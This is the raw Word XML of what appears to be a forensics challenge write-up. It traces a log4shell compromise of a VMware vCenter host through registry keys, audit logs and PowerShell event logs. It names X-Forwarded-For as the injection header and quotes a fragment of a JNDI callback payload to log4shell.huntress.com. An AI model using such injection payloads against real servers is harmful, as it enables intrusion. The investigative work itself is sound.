      </w:r>
    </w:p>
    <w:p w14:paraId="3B3189CD" w14:textId="4CFC8A82" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F64843" wp14:editId="7C61BF80">
            <wp:extent cx="5943600" cy="957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848E" w14:textId="3ACEC8FF" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA"/>
    <w:p w14:paraId="2A01B6E7" w14:textId="3C303F8B" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA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#2 What is the Timezone of the compromised machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220294C9" w14:textId="58129BF7" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA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00BE924A" w14:textId="77777777" w:rsidR="00D675BA" w:rsidRDefault="00D675BA" w:rsidP="00D675BA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Style w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B278C2" w14:textId="77777777" w:rsidR="00D675BA" w:rsidRDefault="00D675BA" w:rsidP="00D675BA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Style w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E526925" w14:textId="77777777" w:rsidR="00D675BA" w:rsidRDefault="00D675BA" w:rsidP="00D675BA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Windows\System32\config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1C35F" w14:textId="3937D77B" w:rsidR="00D675BA" w:rsidRDefault="00D675BA" w:rsidP="00D675BA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lastRenderedPageBreak/>
        <w:t>click System, controlset001, control , timezoneinformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF62E5E" w14:textId="2A9873A7" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00D675BA"/>
    <w:p w14:paraId="3599A4E3" w14:textId="24BB14AB" w:rsidR="00D675BA" w:rsidRDefault="00D675BA" w:rsidP="00D675BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E816241" wp14:editId="4C40CBBE">
            <wp:extent cx="5943600" cy="1304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190" w14:textId="0A86E90F" w:rsidR="00A7069F" w:rsidRPr="00A7069F" w:rsidRDefault="00A7069F" w:rsidP="00A7069F"/>
    <w:p w14:paraId="74A78C75" w14:textId="5AC4648E" w:rsidR="00A7069F" w:rsidRDefault="00A7069F" w:rsidP="00A7069F"/>
    <w:p w14:paraId="3B5285C3" w14:textId="5F849631" w:rsidR="00A7069F" w:rsidRDefault="00A7069F" w:rsidP="00A7069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#3 What is the current build number on the system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB3FCB4" w14:textId="77777777" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="003D149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Windows\System32\config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2605B" w14:textId="77777777" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="003D149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click software , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Microsoft &gt; Windows NT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00674A2B" w14:textId="77777777" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="003D149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current version : 14393</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82B974" w14:textId="3E11874F" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="00A7069F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180B864" w14:textId="51ED044E" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="00A7069F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7DC0D7" wp14:editId="50AD37E8">
            <wp:extent cx="5943600" cy="925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B166" w14:textId="23A36508" w:rsidR="00C73A69" w:rsidRDefault="00C73A69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E67A89D" w14:textId="79BC7E86" w:rsidR="00C73A69" w:rsidRDefault="00C73A69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F4EE5AC" w14:textId="77777777" w:rsidR="00C73A69" w:rsidRDefault="00C73A69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C8A92A3" w14:textId="68B5DD3F" w:rsidR="003D149C" w:rsidRDefault="003D149C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#4 What is the computer IP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B9F5A" w14:textId="77777777" w:rsidR="00C73A69" w:rsidRDefault="00C73A69" w:rsidP="00C73A69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Windows\System32\config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCDF17" w14:textId="77777777" w:rsidR="00C73A69" w:rsidRDefault="00C73A69" w:rsidP="00C73A69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click system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D975351" w14:textId="77777777" w:rsidR="00C73A69" w:rsidRDefault="00C73A69" w:rsidP="00C73A69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ControlSet001 &gt; Services &gt; Tcpip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EFCA5" w14:textId="20CDCF3A" w:rsidR="003D149C" w:rsidRDefault="003D149C" w:rsidP="003D149C"/>
    <w:p w14:paraId="1293B273" w14:textId="4731991A" w:rsidR="00C73A69" w:rsidRDefault="00C73A69" w:rsidP="003D149C"/>
    <w:p w14:paraId="54CB648B" w14:textId="68601E95" w:rsidR="00C73A69" w:rsidRDefault="00C73A69" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA8075B" wp14:editId="5C55C88C">
            <wp:extent cx="5943600" cy="1648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3742" w14:textId="008EC5DB" w:rsidR="001C130C" w:rsidRDefault="001C130C" w:rsidP="003D149C"/>
    <w:p w14:paraId="00492519" w14:textId="055D90A7" w:rsidR="001C130C" w:rsidRDefault="001C130C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#5 What is the domain computer was assigned to?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71830ABE" w14:textId="4B3FFE14" w:rsidR="001C130C" w:rsidRDefault="001C130C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3299702E" w14:textId="77777777" w:rsidR="001C130C" w:rsidRDefault="001C130C" w:rsidP="001C130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cyberdefenders.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437169DE" w14:textId="77777777" w:rsidR="001C130C" w:rsidRDefault="001C130C" w:rsidP="001C130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Windows\System32\config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F740FA" w14:textId="77777777" w:rsidR="001C130C" w:rsidRDefault="001C130C" w:rsidP="001C130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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58849860" w14:textId="77777777" w:rsidR="001C130C" w:rsidRDefault="001C130C" w:rsidP="001C130C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ControlSet001 &gt; Services &gt; Tcpip&gt; Winsock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71032432" w14:textId="06F9E3ED" w:rsidR="001C130C" w:rsidRDefault="00B17C48" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B88295E" wp14:editId="659101AB">
            <wp:extent cx="5943600" cy="1885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6AB" w14:textId="78D1811B" w:rsidR="00B17C48" w:rsidRDefault="00B17C48" w:rsidP="003D149C"/>
    <w:p w14:paraId="1852D17C" w14:textId="7531A812" w:rsidR="00B17C48" w:rsidRDefault="00B17C48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#6 When was myoussef user created?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09B9D8" w14:textId="492B5E52" w:rsidR="007B71B8" w:rsidRDefault="007B71B8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1FCE5B3D" w14:textId="71246F5A" w:rsidR="007B71B8" w:rsidRDefault="007B71B8" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7226DD3D" wp14:editId="580273E1">
            <wp:extent cx="3086100" cy="95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020" w14:textId="474334A5" w:rsidR="007B71B8" w:rsidRDefault="007B71B8" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE9CF14" wp14:editId="30C31682">
            <wp:extent cx="5943600" cy="2550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795A" w14:textId="2A56A59F" w:rsidR="007B71B8" w:rsidRDefault="007B71B8" w:rsidP="003D149C"/>
    <w:p w14:paraId="591C8666" w14:textId="2B364265" w:rsidR="007B71B8" w:rsidRDefault="007B71B8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#7 What is the user mhasan password hint?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9DEBF7" w14:textId="54724350" w:rsidR="007B71B8" w:rsidRDefault="007B71B8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3E8D3312" w14:textId="03E0118D" w:rsidR="007B71B8" w:rsidRDefault="00C1135B" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E19999B" wp14:editId="675A0789">
            <wp:extent cx="5943600" cy="2814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E96" w14:textId="24526B75" w:rsidR="00C1135B" w:rsidRDefault="00C1135B" w:rsidP="003D149C"/>
    <w:p w14:paraId="08F12E9D" w14:textId="31C6B376" w:rsidR="00C1135B" w:rsidRDefault="00C1135B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#8 What is the version of the VMware product installed on the machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF8D9C" w14:textId="5148680C" w:rsidR="00C1135B" w:rsidRDefault="00C1135B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00FE91D0" w14:textId="77777777" w:rsidR="00C1135B" w:rsidRDefault="00C1135B" w:rsidP="00C1135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lastRenderedPageBreak/>
        <w:t>Data Artifacts &gt; Installed Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C92C8" w14:textId="77777777" w:rsidR="00C1135B" w:rsidRDefault="00C1135B" w:rsidP="00C1135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search for VMware product , version is 6.7.0.40322</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC6E0C" w14:textId="5ABE4E89" w:rsidR="00C1135B" w:rsidRDefault="00A3353E" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="324A1C56" wp14:editId="602DDE84">
            <wp:extent cx="31337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BCC7" w14:textId="76BEB05D" w:rsidR="00A3353E" w:rsidRDefault="00A3353E" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F68C6F" wp14:editId="5E33728F">
            <wp:extent cx="5943600" cy="2480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C684" w14:textId="1B783DFF" w:rsidR="00A3353E" w:rsidRDefault="00A3353E" w:rsidP="003D149C"/>
    <w:p w14:paraId="6EEF1967" w14:textId="6FE81428" w:rsidR="00A3353E" w:rsidRDefault="00A3353E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#9 What is the version of the log4j library used by the installed VMware product?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A3AF1" w14:textId="6194057E" w:rsidR="00317F0A" w:rsidRDefault="00317F0A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06A399BB" w14:textId="73AA0FE3" w:rsidR="00317F0A" w:rsidRDefault="00317F0A" w:rsidP="003D149C">
      <w:pP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Go to </w:t>
      </w:r>
      <w:r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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Program Files\VMWare\vCenter Server\VMware </w:t>
      </w:r>
      <w:r w:rsidR="00592269">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity Services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3069CE" w14:textId="063E5E37" w:rsidR="00592269" w:rsidRDefault="00592269" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="498B6094" wp14:editId="78CDB24E">
            <wp:extent cx="5943600" cy="2030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0B78" w14:textId="5EF1ED2D" w:rsidR="00592269" w:rsidRDefault="00592269" w:rsidP="003D149C"/>
    <w:p w14:paraId="0224C74B" w14:textId="0BFDBE41" w:rsidR="00592269" w:rsidRDefault="00592269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#10 What is the log4j library log level specified in the configuration file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207868C8" w14:textId="465877BA" w:rsidR="00592269" w:rsidRDefault="00592269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AF607D1" w14:textId="798B3035" w:rsidR="00592269" w:rsidRDefault="00592269" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48F7EE8A" wp14:editId="1CA82474">
            <wp:extent cx="5943600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58B0" w14:textId="552B8E57" w:rsidR="00592269" w:rsidRDefault="00592269" w:rsidP="003D149C"/>
    <w:p w14:paraId="03008536" w14:textId="18C13B33" w:rsidR="00592269" w:rsidRDefault="00D36FEA" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BA5E03" wp14:editId="5DB58BCE">
            <wp:extent cx="5886450" cy="483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D371" w14:textId="15A46D92" w:rsidR="00D36FEA" w:rsidRDefault="00D36FEA" w:rsidP="003D149C"/>
    <w:p w14:paraId="600C3382" w14:textId="07C40873" w:rsidR="00D36FEA" w:rsidRDefault="00D36FEA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#11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684D9A8" w14:textId="319EA626" w:rsidR="00A743DF" w:rsidRDefault="00A743DF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4D7567B1" w14:textId="77777777" w:rsidR="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="00A743DF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Google “vcenter log4j exploit”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C17DCE6" w14:textId="77777777" w:rsidR="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="00A743DF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“The vulnerability is in the X-Forwarded-For header on the vCenter SSO login page…” , so HTTP header should be X-Forwarded-For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58C869" w14:textId="48AE01F8" w:rsidR="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="003D149C"/>
    <w:p w14:paraId="568E67FA" w14:textId="31C96E92" w:rsidR="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="003D149C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#12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6DE41" w14:textId="77777777" w:rsidR="00A743DF" w:rsidRPr="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="00A74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43DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="org.sleuthkit.autopsy.keywordsearch.High"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="01E93344" w14:textId="0B2F4CDC" w:rsidR="00A743DF" w:rsidRDefault="00A743DF" w:rsidP="00A74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743DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>log4shell.huntress.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A743DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:1389/b1292f3c-a652-4240-8fb4-59c43141f55a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A43A83" w14:textId="77777777" w:rsidR="00274D5F" w:rsidRPr="00A743DF" w:rsidRDefault="00274D5F" w:rsidP="00A74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7A3ABF0" w14:textId="52800287" w:rsidR="00A743DF" w:rsidRDefault="00274D5F" w:rsidP="003D149C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31DF6C8B" wp14:editId="49743C04">
            <wp:extent cx="5943600" cy="3952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F8F6" w14:textId="77777777" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62AD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#13 When was the first successful login to vsphere WebClient?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260EAEE" w14:textId="77777777" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62AD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ProgramData\VMWare\vCenterServer\runtime\VMWareSTSService\logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EDC6A5" w14:textId="14595153" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="003D149C"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click audit_events.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA55658" w14:textId="34EE5FB6" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="003D149C"/>
    <w:p w14:paraId="37DA98C4" w14:textId="41918D42" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="003D149C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C71163A" wp14:editId="63BF8DAF">
            <wp:extent cx="5943600" cy="1649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E7FC" w14:textId="6BCC3323" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62ADB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F3159F" w14:textId="77777777" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62AD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first sucess login : 12/28/2021 12:39:29 PST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C913BDF" w14:textId="7DAD840F" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62AD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submitted with UTC format 28/12/2021 20:39:29 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B02B30" w14:textId="75758E1A" w:rsidR="00071451" w:rsidRDefault="00071451" w:rsidP="00F62AD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</w:p>
    <w:p w14:paraId="364AE873" w14:textId="77777777" w:rsidR="00071451" w:rsidRDefault="00071451" w:rsidP="00071451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#14 What is the attacker’s IP address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C445A3" w14:textId="77777777" w:rsidR="00071451" w:rsidRDefault="00071451" w:rsidP="00071451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color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>look for attacker’s IP in audit_events.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB07174" w14:textId="77777777" w:rsidR="00071451" w:rsidRDefault="00071451" w:rsidP="00071451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Strong"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>192.168.112.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D96818" w14:textId="77777777" w:rsidR="00071451" w:rsidRDefault="00071451" w:rsidP="00F62AD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</w:p>
    <w:p w14:paraId="13D2B1E8" w14:textId="068D600D" w:rsidR="00F62ADB" w:rsidRDefault="00F62ADB" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="78AA7FFA" w14:textId="12F02B74" w:rsidR="00F62ADB" w:rsidRDefault="00071451" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D40D18" wp14:editId="212759D2">
            <wp:extent cx="5943600" cy="2800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C421" w14:textId="31D3E84D" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="2983A24C" w14:textId="33A09F11" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB"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#15 What is the port the attacker used to receive the cobalt strike reverse shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA395B2" w14:textId="77777777" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F12FE1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Windows\System32\winevt\Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B29393" w14:textId="77777777" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F12FE1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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Microsft-Windows-PowerShell%4Operational.evtx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F507B13" w14:textId="1D89FFE0" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495F8014" wp14:editId="2CA6FECE">
            <wp:extent cx="5943600" cy="3725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0273" w14:textId="701BA5C0" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="6FB2A86A" w14:textId="0A182FF4" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB">
      <w:r>
        <w:t>Export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41210B" w14:textId="77777777" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="0A69597C" w14:textId="4C61AA26" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C94B3F" wp14:editId="16EF299A">
            <wp:extent cx="5943600" cy="1384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6BA7" w14:textId="67428FD0" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3B8692" wp14:editId="052FD817">
            <wp:extent cx="5943600" cy="2372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FBFF" w14:textId="6B3752E1" w:rsidR="00050910" w:rsidRDefault="00050910" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="44737BA6" w14:textId="1D5B572A" w:rsidR="00050910" w:rsidRDefault="00050910" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="542BA127" w14:textId="0A9A2ACA" w:rsidR="00050910" w:rsidRDefault="00050910" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EE388E" wp14:editId="6B006E73">
            <wp:extent cx="5943600" cy="818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4858" w14:textId="7EB24EB9" w:rsidR="00050910" w:rsidRDefault="00050910" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="19830DD7" w14:textId="7E669FE7" w:rsidR="00050910" w:rsidRDefault="00050910" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07773422" wp14:editId="2197070E">
            <wp:extent cx="5943600" cy="33820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5F5" w14:textId="2E1B675B" w:rsidR="00902E4A" w:rsidRDefault="00902E4A" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="6C58CF3E" w14:textId="26137EC7" w:rsidR="00902E4A" w:rsidRDefault="00902E4A" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="54F35881" w14:textId="06758D28" w:rsidR="00902E4A" w:rsidRDefault="00902E4A" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B4EC0E" wp14:editId="32A1C0A6">
            <wp:extent cx="5943600" cy="2769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7BF2" w14:textId="76FD1A0A" w:rsidR="00F12FE1" w:rsidRDefault="00F12FE1" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282B1074" wp14:editId="60629116">
            <wp:extent cx="5943600" cy="3712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EE89" w14:textId="44B7F62E" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="606C1894" w14:textId="2DF7C5C0" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="156A2461" w14:textId="2402579C" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="08E7C242" w14:textId="3E141580" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="238999D5" w14:textId="70DF3B0C" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="3EE91DD1" w14:textId="416B9CD9" w:rsidR="00727889" w:rsidRDefault="00727889" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586CFA69" wp14:editId="5DCEAA0C">
            <wp:extent cx="5943600" cy="30219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960" w14:textId="4BD3A9BF" w:rsidR="00C10024" w:rsidRDefault="00C10024" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="1223E9C5" w14:textId="06CBD4D4" w:rsidR="00C10024" w:rsidRDefault="00C10024" w:rsidP="00F62ADB"/>
    <w:p w14:paraId="54B08D93" w14:textId="1FFED2A4" w:rsidR="00C10024" w:rsidRDefault="00C10024" w:rsidP="00F62ADB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#16 What is the script name published by VMware to mitigate log4shell vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE39E18" w14:textId="7034C141" w:rsidR="00094E03" w:rsidRDefault="00094E03" w:rsidP="00F62ADB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32E6BFD8" w14:textId="5ECFD686" w:rsidR="00094E03" w:rsidRDefault="005F6E32" w:rsidP="00F62ADB">
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00094E03" w:rsidRPr="00AE3228">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://kb.vmware.com/s/article/87081</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07A6D10C" w14:textId="74359D5A" w:rsidR="00094E03" w:rsidRDefault="00094E03" w:rsidP="00F62ADB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vc_log4j_mitigator.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E26F7E" w14:textId="54DC20E5" w:rsidR="00094E03" w:rsidRDefault="00094E03" w:rsidP="00F62ADB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1BE6CF27" w14:textId="2BA37647" w:rsidR="00D75C85" w:rsidRDefault="00094E03" w:rsidP="00F62ADB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0477E673" wp14:editId="2E730E34">
            <wp:extent cx="5943600" cy="2078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7C7" w14:textId="77777777" w:rsidR="00D75C85" w:rsidRDefault="00D75C85">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF288B4" w14:textId="1B407526" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
